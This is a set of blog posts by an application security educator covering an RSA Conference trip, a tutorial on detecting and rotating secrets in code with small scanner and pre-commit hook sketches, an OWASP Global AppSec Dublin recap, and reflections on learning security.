After the panel was over, I had to run over to #DevOpsConnect stage, run by TechStrong, a track at RSA dedicated only to DevOps, DevSecOps and other AppSec nerding, topics that are right up my alley. I was on right after DJ Schleen, and other amazing humans who presented on that track the same day, including Caroline Wong and Shannon Lietz.
My talk was about what software developers should do when there is a security incident, when to call the Incident Response (IR) team and how to not ruin evidence, plus please-don’t-think-you-are-saving-the-day-when-really-you’re-creating-a-big-mess. It went pretty well, despite me being a sweaty mess from running across SF to get there on time! Although there’s no live recording of it, WHP has a course about it in the academy.
After that I had another work meeting, but then I got to have some fun: I had the chance to meet with my friend Isabelle Mauny from 42Crunch. She’s the founder of her company, but also, in my opinion, someone who really wants to help developers create more secure APIs. She’s very dedicated to this topic, and if you’re interested in securing your APIs, following her is a great idea. You can see a past presentation she did for WHP here. She’s also going to be on the We Hack Purple podcast soon, don’t miss it!
After that, I went to the RSA Speaker’s dinner in hopes of meeting up with my dear friend Vandana Verma. Although I ended up missing her (I showed up late, my bad) I DID have the chance to run into Jessica Robinson, Chris Romeo (of Security Journey and AppSec podcast fame) and Kim Wuyts, who you may remember I met for the first time in Dublin, Ireland earlier this year at OWASP Global AppSec 2023. She gave an amazing keynote about threat modelling privacy, and made me think of ‘building privacy in’, in a whole new way.
Tuesday April 25
Tuesday started off with a ladies’ breakfast for the Forte Group. Forte is a non-profit made up of women CISOs, CEOs, and startup founders. Chenxi Wang and a few of us started it just after covid began, because we wanted to hang out with other amazing women. Chenxi changed it from “Friday afternoon happy hour” into a vibrant community of incredibly powerful women from our industry, who share knowledge and support each other. Forte group has helped my business and my career immensely, and it’s also been quite a bit of fun. Hats off to Chenxi and the rest of the board members for working very hard to help lift other women up. ALSO, breakfast was a blast!
After the first breakfast I went to my second breakfast event of the day, which was sponsored by SemGrep and Tromzo, where I got to see lots of familiar and wonderful faces such as Jim Manico and Robert Wood of The Soft Side of Cyber. The restaurant served us food that was very pretty and fancy, but it contained almost no calories… Glad the ladies’ breakfast actually fed me… Being a small company owner, I am always on the hunt for free food, lol.
After that I did a quick sound check for an event, then went to the Mend Booth to do a book signing… Except my books were nowhere to be found! I was so embarrassed, there was some sort of shipping error. Instead, I interviewed their CEO Rami Sass live, and then we recorded another one and released it on social media. Despite the mix-up, we ended up having a really good time, plus they gave me a few blog post ideas, we made fun of SBOMs (why didn’t the USA executive order demand that people verify if their dependencies were vulnerable? Or document transitive dependencies too? It felt so underwhelming…), and I now have several MEND water bottles!
From there I went on to my panel for #Snyk with Caroline Wong and Ashish Rajan! You can watch the video of us here: You can see how stylish we are and our amazing chemistry in the image above! Shilpi was behind the camera, ensuring we looked and sounded our best.
If you think this day didn’t have enough action… Then I went to the IANS Faculty Party! I’m a member of the IANS Research faculty, where I work with such amazing humans as: Nicole Dove, Olivia Rose, Mick Douglas, Shannon Lietz, Wolfgang Goerlich, Jake Williams, and… Well, you get the picture. Lots, and lots and lots of amazing humans are part of the faculty, plus the staff are wonderful. We got to have a few drinks and chat in person, which is a change from our usual Slack channel conversations that scroll off the screen. It’s always a pleasure when I have a chance to see them. No photos from this event.
After this I was supposed to attend another party where I was finally going to get to see my friend Vandana, but instead I ordered tasty Asian food from some app on my phone (I was in San Francisco, after all) and stayed in. I had a big day to get ready for. Plus, my legs hurt from climbing one of those famous San Francisco hills…
Wednesday April 26
This morning started with another women-in-tech breakfast, but smaller and only Forte ladies. I then went to film an interview with TechStrong that you can watch here.
From there I went to yet another sound check, then did my “Adding SAST to CI/CD, Without Losing Any Friends” workshop for RSAC with my friend Clint Gibler. We joked around, talked about Static Analysis, and made SemGrep find a lot of bugs in OWASP Juice Shop. It was a total blast! And…. We’re accepted to give it again this summer at B-Sides Las Vegas! If you missed us at RSA, don’t worry, you can still see it at #HackerSummerCamp.
From there I did a book signing at the RSA Bookstore, had more private meetings, then had the absolute pleasure of spending dinner and the rest of my evening with my friend Laura Bell of Safe Stack. Below is a picture of us being silly.
Thursday April 27
Today was the big day, THE DAY I KEYNOTED #RSAC. I remember when they sent the invite for me to be the keynote. I thought “Is this a mistake? Did they mean someone else?” But no, it was me!!!!! I was supposed to do all sorts of things that morning (sorry if I missed you!), but instead I practiced my talk over and over again. Before I went on, the backstage crew asked me multiple times: “Are you nervous?” They asked so many times that I started to become nervous. Before I went on, I thought to myself “Just be yourself. Talk passionately about this because this is very important to you. Tell stories. Be real. It will be fine.” And it was fine! Moreover, it was better than fine. People laughed when they were supposed to laugh, and didn’t when they weren’t supposed to. The recording is below (plus give me a thumbs up if you watch it on YouTube). In addition, here’s an article someone wrote about it, with a summary of all the points I made.
From there, I floated on a cloud to the AppSec Village, of which We Hack Purple is a proud sponsor, to sign copies of my books and give away more stickers. Video below of Liora and I! AppSec Village was founded by Erez Yalon and Liora Herman, and if you’re going to be at Def Con this summer you should definitely go check it out! I plan to be there.
After the AppSec Village hangout, I did something called a “Birds of a Feather” event with RSA. Many of us met to discuss how to create a more positive DevSecOps culture, getting buy in for fixing bugs, and “please don’t turn off my tools!!!!”. It might sound unusual, but I love situations where I get to learn from the audience. When people ask questions, or tell me “At our office, we do this, and here’s why”, I love it. If you have a chance to attend one of these, you should. I know that *I* learned a lot.
After that I got to have dinner with my friend Anshu Bansal of CloudDefense.ai, who was recently on the We Hack Purple Podcast, see his episode here. I’ve been an advisor at Cloud Defense since it was a drawing on the back of a napkin, and I cannot tell you how proud I am of Abhi Aroura and Anshu, the two founders, whom I am proud to call my friends!
To finish off my trip, I had a We Hack Purple in-person meetup! We drank bubble tea, traded stickers, and stories! Below is a pic! I also FINALLY had a chance to spend some time with my wonderful friend Vandana Verma, who had flown in all the way from Bangalore, India!
Throughout all the events I listed, I also had several private business meetings. Some were great, some okay, and some did not go very well at all. I didn’t bother documenting them all here, but there were 28 meetings and events in total, plus a few surprise things that got added last minute. All in all, I would call this a very successful trip!
Friday April 28
This was supposed to be the easiest day of my trip; I was just supposed to get up and fly home, but it ended up being quite stressful. I had a mishap with my ride-share (which took 30 minutes to show up), and then another mishap waiting for security (watch out for the sign in the SFO airport that says both “Clear” and “TSA-Precheck” on it, with an arrow indicating to wait there for those two security options. It turns out that line is only for Clear, and travellers with TSA-Precheck need to somehow read the minds of the airport staff and find the real line, which is over 100 meters away and impossible to see from the sign!). While I was doing this, I was also attempting to negotiate a business deal on the phone, with someone who wouldn’t take no for an answer. I ended up running (literally) through the airport, having a lovely woman recognize me from my keynote and let me jump in front of her in line (thank you, wonderful mystery lady!), and then somehow I just barely managed to get onto my plane to Vancouver before it took off.
After that ‘excitement’ was a 4-hour layover in Vancouver, with more phone calls and emails and negotiations, before I gave up on trying to get work done and called my bestie for advice on “how to say no more forcefully” (she suggested I record a video of me laughing rudely and emailing it to the person, but I decided that was likely not the most mature response… Instead, I politely replied “no thank you”, again). Then I decided to relax and call my mom to say hi, before taking my plane ride back to Vancouver Island, then one more hour to drive home from the airport. I was POOPED!
I kept this last bit in about Friday because I don’t think people understand how un-glamourous the life of a CEO-of-a-small-company and/or person who does public speaking for a living can be. Answering emails into the evenings, taking several calls in-between flights, literally running from event to event, posting the #cybermentoringmonday thread to Mastodon (because it cannot be automated, but I still really want to engage with that community) while in line at a café in the airport, hoping I can get both a latte AND catch my flight… And I’m not telling you the half of it.
When people thank me after I give a talk. When people carry my book onto a plane with them, to bring it to a conference to ask me to sign it. When people tell me how my mentoring program, blog, talks, or any other work I have done has helped them. THAT is what makes every single minute of hard work worth it. When I find out I helped someone find a new job, when they really needed it. When I hear a woman had the courage to ask for a raise, and she got it. When I hear that a company has changed the way they secure their apps, for the better. All of this makes my cup overflow. Thank you for reading about my trip. <3
When I started programming in the ’90s, the security of software wasn’t on everyone’s mind like it is now. I took no security classes in my 3-year college computer science program, and it never even came up as a subject. I was taught to save the connection string for each different environment in the comments of the code, so it was easier for the next programmer to find them. It wasn’t until 2012 that someone ran a web app scanner (also known as a DAST, a dynamic application security testing tool) on one of my apps. I didn’t understand a word of what I read in the report at the time. When I switched from programming to penetration testing, and then on to application security, there was quite a big learning curve for me.
Back to the Secrets
Secrets are what computers use to authenticate to other computers. For instance, an application sending a connection string to a database is its way of asking “I am this specific web app, please let me query your database.” When the database connection works, that’s the database’s way of saying “Sure thing!” Computers don’t have eyes, ears, or brains, so they can’t ‘recognize’ someone like humans can; they have to use secrets.
A secret can be a password, an API secret, a certificate, a hash, a connection string, etc. Most importantly: they should not be shared and should only be saved into your secret management tool. But I am getting ahead of myself.
When we save secrets into our code, it is possible for another programmer to come along and use that secret, for better or for worse. They can log into your database, connect to your API, or do anything else that the secret allows. Sometimes this can seem quite helpful: for instance, when I was a programmer, if a client forgot their password I used to log into the database, grab a copy of their password, use our decryption tool, and tell it to them over the phone. My whole team used to do it. Now I know that it’s more secure to have the user receive a password reset link in their email (to validate they are who they say they are), that the client’s password should have been salted and hashed (a one-way cryptographic method), and that the password to the database should have been kept in a secret management tool (making it unretrievable for human beings). Secrets in our code allow for all sorts of potential attacks, breaches, and embarrassments.
If you want to find out if you have secrets in your code, you can use a tool called a secret scanner. There are many on the market, and many of them are free. They use a variety of ways to try to find secrets, but most commonly they use regular expressions (regex) to look for entropy (extremely long and random strings of characters) and keywords (password, secret, key, etc.).
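To make this concrete, here is a minimal sketch of how a regex-plus-entropy secret scanner might work. The pattern, the keyword list, and the entropy threshold are all invented for illustration; real scanners ship hundreds of tuned rules.

```python
import math
import re

# Rough keyword pattern: an assignment to a secret-ish variable name,
# capturing the value that follows (illustrative, not from any real tool)
KEYWORD_PATTERN = re.compile(
    r'(password|passwd|secret|api[_-]?key|token)\s*[:=]\s*["\']?([^\s"\']{6,})',
    re.IGNORECASE,
)

def shannon_entropy(s: str) -> float:
    """Measure how random a string is; real secrets tend to score high,
    while words like 'changeme' score low."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())

def scan_line(line: str, entropy_threshold: float = 3.5):
    """Return (keyword, candidate_secret) pairs that look suspicious."""
    findings = []
    for match in KEYWORD_PATTERN.finditer(line):
        keyword, value = match.group(1), match.group(2)
        if shannon_entropy(value) >= entropy_threshold:
            findings.append((keyword, value))
    return findings
```

The entropy check is what separates a real credential from a placeholder: a long random string uses many different characters, so it scores high, while `password = "password"` scores low and gets skipped.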
When I work somewhere doing AppSec, I try to get read-only access to the code repositories as soon as possible (for many reasons, not just this). Once I have it, I download all the code, from all the projects I can, in a zip. I unzip it, point my secret scanner at it, and then settle in for a few hours to go hunting around in the code. Putting on music and getting a tasty warm beverage (hot chocolate anyone?) can make this a more enjoyable activity. It’s not exactly riveting.
Start by looking at the first finding. Sometimes it’s something really obviously bad, such as:
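A hypothetical example of that kind of finding (every name and value here is invented for illustration):

```python
# BAD: production database credentials hard-coded in source,
# visible to anyone with read access to the repo
CONNECTION_STRING = (
    "Server=prod-db01;Database=Customers;"
    "User Id=sa;Password=SuperSecret123!;"
)
```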
That’s a secret for sure! The next step is to rotate that secret. Rotating this secret would mean changing the password to something new on the system this is used for. Then you check that new secret into your secret management tool (more on this soon), and then (the hard part) you update the code in this application to fetch the secret from your secret management tool instead and publish the updated code. Do not, under any circumstance, use the same value as the one you found. That secret has been ‘spoiled’, ‘spilled’, or ‘spilt’. It is no longer usable, as someone malicious might have it saved somewhere, or already be actively using it for malicious purposes.
You are going to need to follow this process for every secret you find. Sometimes it means regenerating a certificate, creating a new API, etc. It’s a bit of a pain, but it’s a lot better than having a data breach or other type of security incident to deal with.
Special Note: when you find a secret in the code, depending upon what you found, you may want to trigger the incident response (IR) process, to investigate as to if this secret has been used improperly. When you find a secret, you can’t know if you were the first, second, or tenth person to find it. Kicking off your IR process is a real-life application of the ‘assume breach’ secure design concept.
Preventing Secrets in the Code
Code repositories (also known as version control or ‘repos’) have several types of ‘events’ that can be used to trigger automation. When someone merges their code back into the main branch, you can automate it to run tests to verify it integrates nicely. When code is checked in, the repo can prompt someone else to review the changes before it is merged into all the other code. The event we are interested in is called a ‘pre-commit hook’.
The moment someone checks code in that contains a secret, they have spilt it. The secret will be in the history and backups and maybe even in the logs. You must rotate it. Even if you realize your mistake only 5 minutes later, the damage is done.
A pre-commit hook allows you to run your secret scanning tool on only the new or changed code you are checking in, and if it finds a secret, it stops the check-in process. It gives the user an error message explaining that it thinks it has found a secret, and blocks the code from being checked in. This means the secret has not been spilt; no secret rotation required! If your code does not have a secret in it, your check-in continues, and any other events you set up do their thing. The test takes so little time that it is almost unnoticeable to the end user.
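As a sketch, a pre-commit hook is just an executable script saved as `.git/hooks/pre-commit`; git runs it before each commit and aborts the commit if it exits non-zero. This toy version (the pattern is invented, and real tools do this far better) checks only the staged lines, not the whole repo:

```python
#!/usr/bin/env python3
"""Toy pre-commit hook: block the commit if staged changes look like
they contain a secret. Save as .git/hooks/pre-commit and make executable."""
import re
import subprocess

# Very rough pattern: an assignment to a secret-ish keyword
SUSPICIOUS = re.compile(
    r"(password|passwd|secret|api[_-]?key|token)\s*[:=]", re.IGNORECASE
)

def find_hits(diff_text: str) -> list:
    """Return added lines from a unified diff that look like secrets."""
    added = [
        line for line in diff_text.splitlines()
        if line.startswith("+") and not line.startswith("+++")
    ]
    return [line for line in added if SUSPICIOUS.search(line)]

def main() -> int:
    # Only the new or changed lines being committed are scanned
    diff = subprocess.run(
        ["git", "diff", "--cached", "--unified=0"],
        capture_output=True, text=True,
    ).stdout
    hits = find_hits(diff)
    if hits:
        print("Possible secret detected; commit blocked:")
        for line in hits:
            print("  " + line)
        return 1  # non-zero exit makes git abort the commit
    return 0

# As a real hook, the script would end with: sys.exit(main())
```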
Secret Management tools did not exist when I started programming. In fact, they are somewhat ‘new on the scene’ and not widely adopted, yet. Secret management tools manage secrets for machines. They are not password managers, which manage secrets for humans. They are still fantastic though!
When using secret management tools, generally we create a new vault (an instance of encrypted secrets) per system (the application to which those secrets belong). We do this so that if one vault is compromised somehow (perhaps the vault is lost or corrupted), then only one system will be harmed. We also do this to ensure the vault is accessible by whatever system it supports; you wouldn’t want to have to open a hundred holes in your firewall so that all your systems can connect to it.
When we check a secret into a secret management tool, we say goodbye to it forever. We do not keep a copy elsewhere, because we can trust the secret management tool to keep it safe for us. It’s encrypted in the vault, and it is retrieved only programmatically (humans cannot ‘reveal’ the secret in plaintext). Your CI/CD can retrieve it, your application, APIs, etc. This means your secrets are managed in an automated way, leaving zero room for human error. Trust me, it’s a good deal!
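The application-side pattern looks something like this. The toy in-memory ‘vault’ below stands in for a real secret manager client (such as HashiCorp Vault or AWS Secrets Manager); all class, method, and secret names are invented for illustration:

```python
class SecretVault:
    """Toy stand-in for a real secret manager client. Secrets go in once
    and are only retrieved programmatically; there is no human-facing
    'reveal' feature."""
    def __init__(self):
        self._store = {}

    def put(self, name: str, value: str) -> None:
        self._store[name] = value  # a real vault encrypts at rest

    def get(self, name: str) -> str:
        return self._store[name]

def build_connection_string(vault: SecretVault) -> str:
    # The application never hard-codes the password; it asks the
    # vault for it at runtime instead.
    password = vault.get("customers-db-password")
    return f"Server=db01;Database=Customers;User Id=app;Password={password};"
```

The point of the design: the code that ships contains only the *name* of the secret, never its value, so rotating the secret means updating the vault, not redeploying the app.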
As you follow the process of finding all the secrets, you should take note of false positives, so you can suppress them in the future. An example I ran into myself: there was a license key for a mail merge program, but the company who made the program had gone out of business years ago. This meant that they weren’t breaking any licensing agreement to use it all over the place, and they didn’t need to protect the key because it could be used as many times as they liked. That meant it wasn’t really a secret anymore. We suppressed the license key from then on.
You should create rules to avoid false positives, as it will become annoying over time if you have weird situations like the one mentioned above.
If you work at an organization that has a lot of technical debt, cleaning up all of your secrets can take quite a lot of time. That said, if you have an intern, co-op student, or junior application security person on your team, this is an ideal task for them. It’s lots of work, it’s easy to do, and it looks good on a resume. It also reduces the risk of your organization greatly, which is always a big win.
Recently I had the pleasure of being one of the keynote speakers at OWASP Global AppSec in Dublin, Ireland. In this post I’m going to give a brief overview of some of the talks I saw while I was there, and the TONS of fun I had. I didn’t get to stay very long, and due to jetlag I fell asleep a few times when I wished I could have stayed awake, but overall I would recommend this event (and all the OWASP Global AppSec events) to anyone who is interested in application security, OWASP, or Guinness beer. This is going to be a long blog post; get yourself a beverage and get ready for lots of pictures!
I landed the morning before the conference, and met up with two friends I hadn’t seen in far too long, Takaharu Ogasa from Japan, and Vandana Verma from Bangalore India. I also met another speaker for the event named Meghan Jacquot!
The evening before the conference I had wanted to set up a We Hack Purple in-person meetup, but I was running short on time. Luckily, my friends at SemGrep invited me to a free pre-conference networking event, so I invited all the WHP folks to meet me there. Unfortunately, WAY too many people were there (the place was supposed to hold 50-100 people, but 200 showed up). Although I got to see many friendly faces (see Jessica Robinson, Vandana and I below), it was far too crowded for me. As a Canadian, we’re used to 13 square kilometres of personal space, per person, and it was a bit much for me. ;-D
Luckily Adam Shostack invited me to a super-secret-speaker’s dinner the same evening, held in a giant church that had been converted into an amazing live music venue! There were tap dancers, fiddlers, OWASP Board Members, and Adam did an impromptu book signing!!! Thank you Adam! Next to Adam is Avi Douglen of the OWASP Board of Directors, and also an avid threat modeller.
The next day I woke up extremely early (6:00 am), thanks to a crying baby in the room next to mine at the hotel. :-/ I used this time to call home and practice my talk: Shifting Security Everywhere. You can download a summary of my presentation here. (Note: you are supposed to join my mailing list to receive the PDF, but my mailing list is awesome, so hopefully you feel it’s a good trade. Also, you can easily get around this if you truly do not want to subscribe, simply do not press the ‘confirm subscription’ link).
Grant Ongers, from the OWASP board of directors, kicked off the conference by announcing a brand-new award “OWASP Distinguished Lifetime Member” and then announced the first 4 winners: Simon Bennetts, Rick Mitchell, Ricardo Pereira, and Jim Manico. As a person who has volunteered many hours for OWASP, I felt it was beautiful to see 4 extremely dedicated volunteers receive this much-deserved award. I am very proud of all of them and their amazing contributions to our community! Great job OWASP for thinking of this new way to show appreciation by publicly recognizing some of our most-dedicated volunteers!
The very first talk of the conference was called “A Taste of Privacy Threat Modeling” by a woman named Kim Wuyts, introduced by Avi Douglen (Member of OWASP Board of Directors). She spoke about threat modelling privacy, and used ice cream analogies to explain how marketers see our data. I like ice cream, privacy, AND threat modelling, so this was a real treat (pun intended!). I care a lot about privacy, both personally and professionally, and loved how she used situations we are all familiar with (including eating ice cream too fast then ending up with brain freeze!) to explain various concepts within privacy and threat modelling. I feel like any person, with zero previous technical experience or knowledge, would have been able to follow her entire talk, which is quite rare at a conference like this. She also made her OWN threat modelling privacy game! Nicely done Kim!
After the delicious lunch of yummy curry and rice, and more than one latte, we had the afternoon keynote. Grant Ongers introduced Jessica Robinson, who explained “Why winning the war in cyber means winning more of the everyday battles”. She shared several personal stories from her career, including what it was like to be a woman of colour working in STEM, her obsession with the Kennedys, implementing the first cyber security policy at a large law firm in New York City, and more! The thing I liked most about her presentation was how she took us on a journey. She’s an incredibly gifted public speaker, and she started by getting us all to close our eyes, then imagine various things, before opening our eyes and formally beginning her talk.
Part way through Jess’ presentation the videographer fainted, fell, and made a huge loud noise. He’s okay, don’t worry readers! All 500 of us turned around and grew concerned. She inquired as to whether he was okay, a bunch of staff rushed to take care of him, and once it was clear there was no danger, she recommenced her talk. Not very many speakers would be able to recover like she did. To be able to fully capture our attention again was very impressive. I say this as a person who was a professional entertainer for 17 years, and then a professional public speaker for 6 years; that is an incredible feat. By the end I had completely forgotten about the fainting, because I was so wrapped up in her and the tales she was telling. Anyway, she’s amazing.
At this point I have a silly complaint. Usually when I go to an InfoSec conference, there are only a handful of talks that interest me. I always want to see all of the AppSec talks, maybe some quantum computing, anything to do with using AI to create better security, or topics about cyber warfare (which equally interest and frighten me). But it’s rare at a conference that is not AppSec-focused that I have conflicts in the schedule of things that I really want to see. This happened a LOT at this conference. Sometimes there would be 3 different talks, at the same time, that I was dying to see. I found it very difficult to choose for some of the time slots, which may sound strange, but I’m a very decisive person. Not being able to decide is rare for me. That said, I am pleased to report that all of them were recorded, even if we all know it’s not quite as good as being there in person. I will try to add links to all the talks listed here once the videos are out so that you can enjoy them too!
This is my favourite picture from the entire conference. When you work on an open-source project with someone, you are working because you love what you are doing. When everyone on your team really cares about your goal, you can become very good friends. It is very clear the SAMM team are great friends! I love seeing OWASP bring people together! <3
The talk from the image above was about the OWASP SAMM project – The Software Assurance Maturity Model, presented by Seba Deleersnyder and Bart De Win. I live tweeted their talk (link here), if you want a play-by-play. The essence of their presentation was updates about the project from the past 2-3 years, and how they have worked with the community and industry to update, expand, and improve the model to be more helpful, by creating tools, surveys and online documentation to make their project more useful for everyone. I had been planning on writing a blog post about the project called “OWASP SAMM, for the rest of us”, because I find clients are often very insecure that they won’t ‘measure up’ to the SAMM standard. I hope I can help a bit by breaking things down into smaller pieces, and helping teams start where they are at, then working their way up over time. SAMM can work for any team, just be realistic and try not to be too hard on yourself! We all have to start somewhere.
After Seba and Bart’s talk it was time for the networking event. OBVIOUSLY, they had Guinness beer on tap! We were in Ireland! I had a great time, chatting with all sorts of people, and I got an awesome gift of a Tigger-striped hoodie from Avi Douglen, which made my day! Then I went back to my hotel room to practice my talk, approximately a thousand times.
Side note: Remember the baby in the hotel room next to mine? The night before my talk it started crying, loudly, at 3:00 AM, and continued crying all the way until 6:00 am. I was up almost the entire night. Which gave me plenty of time to practice my talk. Yay?
Usually when you see me present a ‘new’ talk at a conference, it is not the first time that I have presented it. In fact, I have often given it 5 to 10 times, in front of 1 or 2 people each time, which is why I usually seem so comfortable on stage. I always practice new material on people from my community (We Hack Purple, OWASP Ottawa, the Ottawa Ladies Code Meetup, WoSEC Victoria, etc.). I’ve always turned to my community for feedback, advice, and encouragement. They have always been gentle, kind, and give reliably fantastic advice! I would recommend every speaker do this! But this time, because I was asked to do this with so little time, I hadn’t presented it in front of anyone. In fact, I was still writing it as I flew across the ocean to the venue. I WAS SO NERVOUS!!!!!
But it went really well anyway! Phew! And Matt Tesauro introduced me, so that was extra-nice! Matt is on the OWASP Board of directors and a leader of the Defect Dojo Project. Actually, he’s been a part of several different projects and chapters over the years. He was kind enough to distribute the maple-candies I brought to give to all the people who asked questions. Having a long-time friend introduce me made me a lot less nervous! Thank you Matt!
Now that my talk was over, I could concentrate completely on having fun! I ended up in the hallway speaking to lots of people and missing the talk after mine. Then we had lunch, and then came another time slot where there were THREE talks I wanted to see. THREE amazing presentations to choose from! I ended up in Tal Melamed’s talk, about the OWASP Serverless Top Ten. I had spoken to Tal many times before, but it was our first time meeting in person, so that was pretty exciting for me. I even managed to sit with him for lunch! Even though I already knew the Serverless Top Ten, it was still exciting to see Tal speak to it. As a bonus, he ended slightly early, so I was able to catch the Q&A after Matt Tesauro’s talk about Hacking and Defending APIs – Red and Blue make Purple. I felt this was a good compromise.
After lunch the wonderful Vandana Verma got on stage to introduce the last keynote speaker. She told us all that there would be “a BIG announcement” at 5:30 pm, so we had better not leave early. For those that don’t know, the big announcement was that OWASP has officially changed their name (but not the acronym). Previously it stood for “Open Web Application Security Project”, but that name was limiting. People often complained that we kept straying outside our purpose, by including cloud, containers, etc. But why would we want to limit ourselves like that? So the board of directors voted to change it to “Open World Wide Application Security Project”, which I have to say, I like WAY BETTER. Nicely done board!
The last keynote was Dr. Magda Chelly, and it was spectacular! In her talk, AI-Assisted Coding: The Future of Software Development; between Challenges and Benefits, she spoke about how AI is going to change the way most of us work, especially those of us in IT. I don’t want to give away the entire talk, but… She explained how many of us could work with AI, the difference between AI-assisted and AI-created content (this is more important than I had previously realized), and all the issues and questions around who owns the copyright of such work. If an AI creates a poem, but you asked it to create a poem, and gave it the parameters to create said poem, who owns the copyright? What if it only assisted you in creating an application, it didn’t write all the code, just some of the code? Who owns that? Also, when we train AI on certain data, but that data has specific licensing, and then the AI creates code that is not licensed in the same way, has the created code broken the license agreement? There was a fascinating discussion during the Q&A, and it definitely has me thinking about such systems in a very new way.
The last talk that I saw at the conference was presented by someone named Adam Berman, and it was called “When is a Vulnerability Not a Vulnerability?”. For those of you who have followed me a long time, you would know that I wrote a blog post with that exact title in 2018 (read it here). My post was about when vulnerabilities are reported to bug bounty programs, but they are not exploitable/do not create business risk, is it really a vulnerability? In it I explored a ‘neutered’ SQL injection attack, and of all the posts I have ever written, it has received by far the most scrutiny.
That said, although there was a similar slant, it was definitely not based off of anything I have written or spoken on. Which made it extra-exciting for me!
Adam works at R2C (who make SemGrep), so all of the research came from them. In April of this year, I will be co-presenting a workshop at RSA with Clint Gibler (of R2C and TL;DR Sec fame) about ‘How to Add SAST to CI/CD, Without Losing Any Friends’ (no link available at this time). We will be using SemGrep to demo all the lessons, so I was extra-curious to see Adam speak!
Adam’s talk was all about traceability in Software Composition Analysis (SCA). A recurring issue when you work in AppSec is developers not having enough time to fix everything we ask them to. We (AppSec folks) are constantly trying to persuade, pressure, demand, and even beg developers to fix the bugs we have reported. One of the most convincing ways to get a developer to fix a bug is by creating an exploit. But that is VERY time consuming! It’s not realistic for us to create a proof-of-concept exploit for every single result that our scanners pick up. Layer on top of this the fact that automated tools tend to report a LOT of false positives, and this leads many developers to question if they absolutely need to fix something, or if “maybe we can leave it until later”. And by “later” I mean “never”.
If you scan an application with an SCA tool, most of them will tell you if any of the dependencies in your application are ‘known to be vulnerable’. They do this by checking a list of things they know are vulnerable (they create this list in many ways, and Adam covered that, but that part is not the exciting part, you can learn that anywhere). Think of the SCA tool working like this: “Are you using Java Struts version 2.2? Yes? It’s vulnerable! I shall now report this to you as a vulnerability!” But just because the dependency has a vulnerability in it, it doesn’t necessarily mean that your application is vulnerable, and herein lies the problem.
If your application is not calling the function(s) that have the vulnerability in them, then your app shouldn’t be vulnerable (in most cases this is true, there are rare exceptions, specifically Log4J). Previously, SemGrep released a blog post about this (you can read it here), and they claim that approximately 98% of all results from SCA tools are false positives, because the vulnerable function within the dependency is never called from the scanned app. Which means there’s no risk to the business. Which means it’s a false positive. It’s still technical debt, which is not great, but it’s not a great big hole in your defenses, and that’s a very different (and much less scary) problem.
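To make the idea of “reachability” concrete, here is a toy sketch in Python. The package name (`badlib`) and vulnerable function (`parse_unsafe`) are invented for illustration; real tools do far more sophisticated analysis across languages and call chains, but the core question is the same: does your code actually invoke the vulnerable function, or merely depend on the package that contains it?

```python
import ast

# Hypothetical "known vulnerable" entry: package badlib, function parse_unsafe.
VULNERABLE_CALLS = {("badlib", "parse_unsafe")}

def calls_vulnerable_function(source: str) -> bool:
    """Return True if the source code calls a known-vulnerable function."""
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            func = node.func
            # Matches calls of the form badlib.parse_unsafe(...)
            if (isinstance(func, ast.Attribute)
                    and isinstance(func.value, ast.Name)
                    and (func.value.id, func.attr) in VULNERABLE_CALLS):
                return True
    return False

# Both apps depend on badlib, but only one is actually at risk.
safe_app = "import badlib\nresult = badlib.parse_safe(data)"
risky_app = "import badlib\nresult = badlib.parse_unsafe(data)"
print(calls_vulnerable_function(safe_app))   # False: dependency present, vulnerability not reachable
print(calls_vulnerable_function(risky_app))  # True: the vulnerable function is invoked
```

A plain SCA tool would flag both apps identically, because both import `badlib`; reachability analysis is what separates the 2% of real findings from the rest.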
If you’ve been begging developers to update all sorts of dependencies, imagine if you reduced your number of asks by 98%? And you could show them where their app is calling the problematic function? That conversation would likely be a lot less difficult. In fact, I bet the developers would jump to fix it. Because it would be obvious that it’s a real risk to the business.
This is a BIG CLAIM, so I wanted to hear the details in person. And I did!
Because this was an OWASP event, Adam couldn’t just say “Yo, SemGrep is awesome, buy our stuff”. If he did that, it would also make for a not-very-entertaining-or-believable presentation. Instead, he explained HOW to do this yourself. And just how much work it is. Spoiler alert: it’s a lot of work.
Although I would love to provide the technical details for you, I have to admit that I was almost falling asleep the entire time because of the “absolutely no sleep” situation from the night before with the crying baby. I must have yawned 100 times, and I was more-than-a-little concerned I may have offended the speaker! So I can’t give you the details, but I will post a link here as soon as I have it so you can watch Adam explain. He’s better at explaining it anyway!
Then I went to bed (at 4:00 pm, and I slept all the way until 5:00 am the next day!). After that I headed to the airport, flew home, and wrote this on the plane! I hope you enjoyed my summary of my experience at OWASP Global AppSec 2023, held in Dublin, Ireland, February 14th and 15th, 2023.
Working in the information technology (IT) field means you need to be comfortable with things at work constantly changing and the need to continue to learn as your career grows. Working in information security (InfoSec) means you not only need to keep up with all sorts of IT trends, but also the attacks, defenses, and mitigations for each. When I started learning about DevOps, and how they value continuous learning and ‘taking time to improve your daily work’, I was sold. But I wasn’t quite sure how to go about putting it into practice.
When I switched from being a software developer to a penetration tester, and then onto application security, I had a lot to learn. On top of that, I am dyslexic, so the more common ways that people learn don’t always work well for me. Even worse, my training budget for my job in the Canadian Public Service was $2,500 CAD a year (approximately $1900 USD) and I wasn’t allowed to travel for courses. Living in Ottawa, Canada at the time, there weren’t very many options that were within my reach.
I started out my security career switch with a professional mentor, but the first one didn’t work out very well. He got frustrated with me quickly, no matter how hard I tried. Although I found out later that his expectations were near-impossible to meet, and what was asked of me was not very reasonable (nor ethical at times). Example: He asked me on a Friday to learn pentesting over the weekend, with no help or advice, and then told me to do my first pentest the following Monday, setting me loose on a client’s live production system, with zero previous experience. It did not end well, for me or for the client. The mentor and I went our separate ways.
By this point I had started joining security communities. And I LOVED it. My favourite community of all the local ones I could find was OWASP, the Open Web Application Security Project. The Ottawa chapter was led by someone named Sherif Koussa, who I am proud to still call my friend and mentor today. I made friends quickly, found more than one new mentor, and even became a chapter leader. I learned a lot by inviting speakers, talking to others in the community, and volunteering for projects.
Eventually I started doing public speaking, which provided me with free tickets to conferences, and sometimes even free training! I also started my own OWASP project (OWASP DevSlop) so that I could learn how to secure software in a DevOps environment.
It became clear to me, very quickly, that I learn best by reading/listening/watching something, then trying it for myself, then teaching it to someone else. I also enjoy learning more when I follow this process, rather than only reading or watching videos. I realize this is way more work than just reading a book, but everyone is different. And I’m lucky because other people seem to like my style of teaching and writing, which motivates me in a way I had never previously known. 😀
